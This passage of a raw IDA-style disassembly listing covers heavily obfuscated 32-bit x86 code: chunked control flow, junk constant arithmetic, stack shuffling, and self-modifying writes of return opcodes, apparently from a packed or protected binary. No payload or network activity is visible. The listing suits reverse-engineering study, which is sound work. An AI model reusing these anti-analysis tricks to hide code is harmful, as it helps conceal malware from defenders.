; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DCC

loc_443B8D:				; CODE XREF: sub_441DCC:loc_4407CCj
		push	8FED1C95h
		pop	edx
		or	edx, 96FECE5Bh
		xor	edx, 0E010B1E4h
		jmp	loc_446C64
; END OF FUNCTION CHUNK	FOR sub_441DCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_443BA4:				; CODE XREF: sub_4529E2:loc_453014j
		call	sub_4402FA
		push	ebx
		mov	ebx, edx
		call	sub_44E360

loc_443BB1:				; CODE XREF: k2vbe3.d:loc_44756Dj
					; sub_45AAEB-105CFj
		jl	loc_43F0BA

loc_443BB7:				; CODE XREF: k2vbe3.d:00457AD6j
		jmp	nullsub_136
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D910

loc_443BBC:				; CODE XREF: sub_44D910+Cj
		jmp	loc_44B67F
; END OF FUNCTION CHUNK	FOR sub_44D910
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_443BC1:				; CODE XREF: sub_43D823+9C2Dj
		jmp	loc_457738
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------
		shl	esi, 1Ah
		jmp	loc_43F0B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF20

loc_443BCE:				; CODE XREF: sub_44FF20+9j
		mov	eax, 0E211C416h
		push	ebx
		push	0CD775DFCh
		pop	ebx
		jmp	loc_44BD3C
; END OF FUNCTION CHUNK	FOR sub_44FF20

; =============== S U B	R O U T	I N E =======================================



sub_443BDF	proc near		; DATA XREF: sub_458B9B-1B136o

; FUNCTION CHUNK AT 0043D14E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004416B1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441F93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443D9C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044522F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044692E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004472F1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00448F73 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BAF3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044C529 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452175 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452684 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004532B7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045401B SIZE 00000006 BYTES

		cmp	byte ptr [eax],	0F1h
		jnz	loc_441F98
		jmp	loc_4416B1
sub_443BDF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_443BED:				; CODE XREF: k2vbe3.d:0043FC85j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44314D

loc_443BEE:				; CODE XREF: sub_44314D+16j
		and	edi, 0B2B565A9h
		xor	edi, 9D923Bh
		add	eax, edi
		pop	edi
		mov	eax, [eax]
		jmp	loc_459552
; END OF FUNCTION CHUNK	FOR sub_44314D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD32

loc_443C04:				; CODE XREF: sub_43CD32+8j
		add	dword ptr [ebp-8], 2
		jmp	loc_447982
; END OF FUNCTION CHUNK	FOR sub_43CD32

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_443C0D	proc near		; CODE XREF: sub_44416D+1402p
					; k2vbe3.d:loc_45943Cp

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 00446682 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BCA6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044D7CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450617 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045541E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00455433 SIZE 00000008 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp+var_4], eax
		jmp	loc_450617
sub_443C0D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_443C1B:				; CODE XREF: sub_45B74D:loc_45595Fj
		jz	loc_4403CD
		mov	eax, [ebx]
		mov	[ebx], esi
		or	ebx, eax
		sub	eax, 599AF2C9h
		jmp	loc_4403CD
; END OF FUNCTION CHUNK	FOR sub_45B74D
; ---------------------------------------------------------------------------

loc_443C32:				; DATA XREF: sub_4524DE+Ao
		lea	eax, loc_458EC1
		mov	byte ptr [eax],	0C3h
		jmp	loc_44C4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AE3

loc_443C40:				; CODE XREF: sub_441AE3:loc_458EC1j
		pop	edx
		mov	eax, [esp-0Ch+arg_8]
		push	edx
		call	sub_4479A1
		push	564EB5F1h
		pop	eax
		jmp	loc_44DA65
; END OF FUNCTION CHUNK	FOR sub_441AE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_443C55:				; CODE XREF: sub_44471B+17816j
		test	eax, edi
		push	offset loc_43EB82
		jmp	nullsub_447
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2FC

loc_443C61:				; CODE XREF: sub_43E2FC+1968Bj
					; k2vbe3.d:0045799Aj
		sub	esi, 8AFFE89Dh
		add	esi, 6AC0B894h

loc_443C6D:				; CODE XREF: k2vbe3.d:loc_448ECAj
		mov	[esi], eax
		pop	esi
		lea	eax, nullsub_493
		jmp	loc_44C960
; END OF FUNCTION CHUNK	FOR sub_43E2FC
; ---------------------------------------------------------------------------

loc_443C7B:				; CODE XREF: k2vbe3.d:0043DC87j
		jo	loc_45020B

; =============== S U B	R O U T	I N E =======================================



sub_443C81	proc near		; CODE XREF: sub_454890+Cp
		xchg	edx, [esp+0]
		pop	edx
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_519
sub_443C81	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	ebx, [esp]
		jmp	loc_451A18
; ---------------------------------------------------------------------------

loc_443C95:				; DATA XREF: sub_459382:loc_459389o
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	edx, [esp]
		push	edx
		jmp	loc_449AF0
; ---------------------------------------------------------------------------

loc_443CA3:				; CODE XREF: k2vbe3.d:loc_44550Ej
		pop	edx
		xor	edx, 5FAAFB13h
		add	edx, 1C888B73h
		mov	[edx], eax
		jmp	loc_45AA51
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD01

loc_443CB7:				; CODE XREF: sub_43CD01+5j
		jns	loc_44394A
		add	ebx, eax
		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp-4+arg_0]
		jmp	loc_4484C3
; END OF FUNCTION CHUNK	FOR sub_43CD01
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_415. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_443CCB:				; CODE XREF: sub_43DEBE+95DFj
		jnz	loc_43FFAC
		rol	edi, 2
		jmp	loc_43FFA8
; END OF FUNCTION CHUNK	FOR sub_43DEBE

; =============== S U B	R O U T	I N E =======================================



sub_443CD9	proc near		; DATA XREF: sub_44D345+CEB2o

; FUNCTION CHUNK AT 0043D872 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00442DCA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044616C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044716A SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00449617 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044B70F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045509B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C0BF SIZE 0000000E BYTES

		jz	loc_43D872
		mov	eax, [ebp-4]
		jmp	loc_44B70F
sub_443CD9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D345

loc_443CE7:				; CODE XREF: sub_44D345:loc_44D34Ej
		mov	eax, [ebp+var_4]
		movzx	eax, byte ptr [eax]
		cmp	ds:dword_445648[eax*4],	0
		jz	loc_44757D
		push	offset loc_43DBC9
		jmp	loc_454CF8
; END OF FUNCTION CHUNK	FOR sub_44D345
; ---------------------------------------------------------------------------
		mov	edx, 24CC2B1h
		push	edi
		push	806AAAB4h
		pop	edi
		or	edi, 0C8896956h
		jmp	loc_453A80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4551FC

loc_443D1C:				; CODE XREF: sub_4551FC+7j
		push	offset loc_458086
		jmp	nullsub_181
; END OF FUNCTION CHUNK	FOR sub_4551FC
; ---------------------------------------------------------------------------

loc_443D26:				; CODE XREF: k2vbe3.d:loc_44177Dj
		add	esi, 0BC73B73Bh
		xchg	esi, [esp]
		jmp	loc_4549D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450983

loc_443D34:				; CODE XREF: sub_450983:loc_43CC83j
		jnz	loc_45AE6F
		jmp	loc_43C62B
; END OF FUNCTION CHUNK	FOR sub_450983
; ---------------------------------------------------------------------------
		popf
		jmp	loc_44F690
; ---------------------------------------------------------------------------

loc_443D45:				; DATA XREF: sub_43E204+13C1o
		pop	ecx
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_443D49:				; CODE XREF: sub_44B912+1062Aj
		jmp	loc_44B2BE
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_443D4E:				; CODE XREF: k2vbe3.d:loc_43D5EEj
					; sub_43DA1E+242Fj ...
		pop	large dword ptr	fs:0
		add	esp, 4
		retn
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445EB0

loc_443D59:				; CODE XREF: sub_445EB0+7j
		jmp	loc_4498EB
; END OF FUNCTION CHUNK	FOR sub_445EB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_443D5E:				; CODE XREF: sub_44DB59-6FEFj
		mov	ebp, 5FCF28AAh
		push	0E1EDDF70h
		pushf
		jmp	loc_453FA4
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_44BAE2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C5F

loc_443D74:				; CODE XREF: sub_456C5F-26BCj
		call	sub_4517AE
		push	offset loc_453EAE
		jmp	loc_4550F2
; END OF FUNCTION CHUNK	FOR sub_456C5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_443D83:				; CODE XREF: sub_43FF90+17619j
		jnz	loc_448E9C
		shl	edx, 0Ch
		jmp	loc_43CB75
; END OF FUNCTION CHUNK	FOR sub_43FF90
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_94. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_443D92:				; CODE XREF: k2vbe3.d:00459B85j
		jmp	loc_4549C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_443D97:				; CODE XREF: sub_450F71-12F95j
		jmp	loc_451469
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_443D9C:				; CODE XREF: sub_443BDF+F6E4j
		jp	loc_45650C
		xor	ecx, 0C92D9802h
		or	ecx, edx
		xchg	ecx, eax
		and	eax, 0B76C471Ch
		jmp	loc_4472F1
; END OF FUNCTION CHUNK	FOR sub_443BDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4583B8

loc_443DB7:				; CODE XREF: sub_4583B8:loc_442A9Dj
		jz	loc_446E16
		jmp	loc_446D12
; END OF FUNCTION CHUNK	FOR sub_4583B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_443DC2:				; CODE XREF: sub_447E07:loc_45BD62j
		cmp	edi, 877CED4Bh
		jmp	loc_447F8E
; END OF FUNCTION CHUNK	FOR sub_447E07
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_53. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_443DCE:				; CODE XREF: sub_446E24+44F1j
		jmp	loc_45A1A1
; END OF FUNCTION CHUNK	FOR sub_446E24
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_224. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_443DD4:				; CODE XREF: k2vbe3.d:004428F6j
		sbb	ebp, 0F0CA151h

loc_443DDA:				; CODE XREF: k2vbe3.d:loc_4428E9j
		add	ecx, 0D95C70FBh
		test	ecx, 8000000h
		jmp	loc_44D15C
; ---------------------------------------------------------------------------
		adc	ecx, 0EAFA56A4h
		jmp	sub_45BD87
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_443DF6:				; CODE XREF: sub_44067C:loc_44D9F8j
		xchg	edx, [esp-4+arg_0]
		jmp	loc_451D08
; END OF FUNCTION CHUNK	FOR sub_44067C
; ---------------------------------------------------------------------------
		call	sub_4448E9
; START	OF FUNCTION CHUNK FOR sub_440E8E

loc_443E03:				; CODE XREF: sub_440E8E+F00Aj
		jmp	nullsub_98
; END OF FUNCTION CHUNK	FOR sub_440E8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_443E08:				; CODE XREF: sub_44F20A+Aj
		jmp	loc_456858
; END OF FUNCTION CHUNK	FOR sub_44F20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AF0C

loc_443E0D:				; CODE XREF: sub_44AF0C+7j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44AF0C
; ---------------------------------------------------------------------------

loc_443E12:				; CODE XREF: k2vbe3.d:00445E88j
		jmp	loc_4476D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429FF

loc_443E17:				; CODE XREF: sub_4429FF-1665j
		jmp	loc_448710
; END OF FUNCTION CHUNK	FOR sub_4429FF
; ---------------------------------------------------------------------------

loc_443E1C:				; CODE XREF: k2vbe3.d:00451FEFj
		jns	loc_443257
		push	86E90394h
		jmp	sub_4572F6
; ---------------------------------------------------------------------------
		mov	ds:dword_41E060, eax
		lea	eax, nullsub_493
		mov	byte ptr [eax],	0C3h
		jmp	loc_453DB4
; ---------------------------------------------------------------------------

loc_443E40:				; CODE XREF: k2vbe3.d:00448F8Bj
		mov	eax, [esp]
		push	edx
		push	esi
		push	0AAD633D0h
		jmp	loc_43CE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_443E4F:				; CODE XREF: sub_446E24+1C39j
		jz	loc_43E23D
		jmp	loc_45AA34
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500BB

loc_443E5A:				; CODE XREF: sub_4500BB+AE43j
		push	offset sub_44F70D
		jmp	loc_43F27E
; END OF FUNCTION CHUNK	FOR sub_4500BB

; =============== S U B	R O U T	I N E =======================================



sub_443E64	proc near		; CODE XREF: k2vbe3.d:loc_4414EAp
					; k2vbe3.d:0044A45Fj
		xchg	esi, [esp+0]
		pop	esi
		push	ecx
		push	0EAD67B98h
		jmp	loc_45B482
sub_443E64	endp


; =============== S U B	R O U T	I N E =======================================



sub_443E73	proc near		; CODE XREF: sub_44660F-9A60j
					; k2vbe3.d:0044D287p

var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043D22E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440CC5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044268F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00447AFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449848 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044CAE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004547CE SIZE 00000012 BYTES

		xchg	esi, [esp+0]
		pop	esi
		pop	ecx
		jo	loc_44268F
		mov	eax, [esp+4+var_4]
		jmp	loc_44CAE9
sub_443E73	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_443E86:				; CODE XREF: sub_4440E5:loc_44505Bj
		xchg	ebx, [ecx]
		jmp	loc_43E395
; END OF FUNCTION CHUNK	FOR sub_4440E5

; =============== S U B	R O U T	I N E =======================================



sub_443E8D	proc near		; CODE XREF: sub_40900D+4Bp
					; sub_40E632+29Cp ...
		call	sub_443E9D
		jmp	ds:off_41E0D8
sub_443E8D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_443E98:				; CODE XREF: sub_4426DF+9C4Dj
		jmp	loc_450A4F
; END OF FUNCTION CHUNK	FOR sub_4426DF

; =============== S U B	R O U T	I N E =======================================



sub_443E9D	proc near		; CODE XREF: sub_443E9D:loc_442820j
					; sub_451F91:loc_443B77j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E33B SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00442820 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447DB2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D46 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00456456 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004589BF SIZE 00000019 BYTES

		xchg	esi, [esp+0]
		mov	edx, esi
		pop	esi
		jz	loc_4589BF
		jmp	loc_455D46
sub_443E9D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_443EAE:				; CODE XREF: sub_43FF90+D4EDj
		pop	eax
		sub	eax, 321D54ADh
		xor	eax, 3FE94004h
		add	eax, 0E2491E25h
		push	ebx
		push	offset sub_44A992
		jmp	loc_45B37C
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45156D

loc_443ECC:				; CODE XREF: sub_45156D+8126j
		jz	loc_443A7E
		jmp	loc_449BD9
; END OF FUNCTION CHUNK	FOR sub_45156D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_443ED7:				; CODE XREF: sub_43F34C+1416Bj
		add	eax, 3B9C4192h
		sub	eax, 1778F78Dh
		xor	eax, 4618727h
		add	eax, ebp
		jmp	loc_43DC2A
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------

loc_443EF0:				; CODE XREF: k2vbe3.d:0045AA95j
		jno	loc_4585B3

; =============== S U B	R O U T	I N E =======================================



sub_443EF6	proc near		; CODE XREF: sub_43EFC9+82Cp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E9DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F47B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00444FBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447B89 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447BA8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00448768 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B028 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004516D2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451FCE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045396F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00454A1A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00455969 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456DDB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458D16 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459F9C SIZE 00000005 BYTES

		xchg	ebx, [esp+4+var_4]
		pop	ebx
		or	eax, eax

loc_443EFC:				; CODE XREF: k2vbe3.d:loc_4489D7j
		jnz	loc_444A64
		jmp	loc_448768
sub_443EF6	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_367. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_443F08:				; CODE XREF: sub_43E135+Cj
		jmp	loc_452DBD
; END OF FUNCTION CHUNK	FOR sub_43E135

; =============== S U B	R O U T	I N E =======================================



sub_443F0D	proc near		; CODE XREF: k2vbe3.d:00449F47j
					; sub_4514B7:loc_4514B8p

var_20		= dword	ptr -20h
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DE63 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F68D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004418A6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004447C1 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00444AD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044816E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044933C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044962F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CB3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D0F5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044DCE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FCAA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00453C34 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004554FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BF65 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045C121 SIZE 0000002B BYTES

		xchg	edi, [esp+8+var_8]
		pop	edi
		push	ebx
		mov	ebx, ebp
		xchg	ebx, [esp+8+var_8]
		push	edx
		mov	edx, esi
		xchg	edx, [esp+0]
		jmp	loc_444AD1
sub_443F0D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DCF5

loc_443F22:				; CODE XREF: sub_44DCF5:loc_440DDCj
		xor	eax, ebp
		jmp	loc_44C58F
; END OF FUNCTION CHUNK	FOR sub_44DCF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_443F29:				; CODE XREF: sub_4423D2-3DDEj
		popf
		or	ebx, ecx

loc_443F2C:				; CODE XREF: sub_4423D2:loc_43E5ECj
		xor	ecx, 7D71581Eh
		add	ecx, ebp
		jmp	loc_4542F6
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478AB

loc_443F39:				; CODE XREF: sub_4478AB+16j
		pop	edi
		or	edi, 0D71B25B7h
		add	edi, 65E25Dh
		xchg	edi, [esp+4+var_4]
		jmp	loc_454BBE
; END OF FUNCTION CHUNK	FOR sub_4478AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456706

loc_443F4E:				; CODE XREF: sub_456706:loc_446A23j
		xchg	edi, [esp+0]
		push	offset loc_44ACDC
		jmp	loc_4542F1
; END OF FUNCTION CHUNK	FOR sub_456706

; =============== S U B	R O U T	I N E =======================================



sub_443F5B	proc near		; DATA XREF: sub_456FED-E34o

; FUNCTION CHUNK AT 00441317 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00446EFD SIZE 00000005 BYTES

		push	edx
		call	sub_443A95
		push	0F32101FAh
		pop	eax
		rol	eax, 9
		add	eax, 0DE36F26Bh
		jmp	loc_441317
sub_443F5B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4545C4

loc_443F75:				; CODE XREF: sub_4545C4-2226j
		push	offset loc_4478E3
		jmp	nullsub_157
; END OF FUNCTION CHUNK	FOR sub_4545C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44680D

loc_443F7F:				; CODE XREF: sub_44680D+96B4j
		xor	ecx, ebp
		ror	edi, 1Eh
		rol	esi, 8
		shr	ecx, 4

loc_443F8A:				; CODE XREF: sub_44680D+96A8j
		or	edi, 14BD7E34h
		and	edi, 0C1D875ACh
		sub	edi, 0C205CE8Fh
		xor	edi, 760D91FFh
		jmp	loc_44EF19
; END OF FUNCTION CHUNK	FOR sub_44680D
; ---------------------------------------------------------------------------

loc_443FA7:				; CODE XREF: k2vbe3.d:0044CE2Ej
		mov	esi, 2207D58Bh

; =============== S U B	R O U T	I N E =======================================



sub_443FAC	proc near		; CODE XREF: k2vbe3.d:0044A5ECp

; FUNCTION CHUNK AT 0043F5AC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00441404 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	edx, 7DA2A87Dh
		call	sub_45B20A
		push	edx
		jmp	loc_441404
sub_443FAC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_443FC1	proc near		; CODE XREF: k2vbe3.d:0044253Ej
					; sub_44DB59-4898p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0043CE36 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043D252 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043DAF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DFA2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E3D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E6E9 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00440458 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004411C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044263A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00442C5B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00443257 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004435A8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444821 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00446853 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044752A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00449D1A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044AB7E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044ABC2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CE81 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D3C2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D3D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D548 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044FBAD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450899 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451C8B SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00455284 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004565AE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00456B29 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459238 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004592D8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00459C0A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045A817 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045BBE3 SIZE 00000014 BYTES

		xchg	edx, [esp-4+arg_0]
		pop	edx
		popf
		xchg	edi, [esp-0Ch+arg_8]
		mov	eax, [ebp+8]
		push	eax
		call	sub_43CC89
		jmp	loc_449D1A
sub_443FC1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_443FD7:				; CODE XREF: sub_44C90E:loc_459FE1j
		cmp	dword ptr [ebp-10Ch], 76676264h
		jmp	loc_45160A
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_443FE6:				; CODE XREF: k2vbe3.d:loc_444A4Aj
		jz	loc_440748
		jmp	loc_44D6EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_443FF1:				; CODE XREF: sub_43DFE1+119A0j
		jg	loc_44477B
		mov	ecx, ebp
		cmp	eax, ecx
		jmp	loc_44F742
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_444000:				; CODE XREF: sub_444D7B+48CFj
		sub	eax, 6DD8DB82h
		or	eax, 0F0CBC483h
		jnz	loc_452970
		push	82A75D2Ch
		jp	loc_443816
		jmp	loc_44CC54
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------

loc_444022:				; CODE XREF: k2vbe3.d:0044720Fj
		xor	esi, 43164E47h
		add	esi, 330A1555h
		xor	esi, 915A8099h
		and	esi, 0C4E68422h
		jmp	loc_447FCB
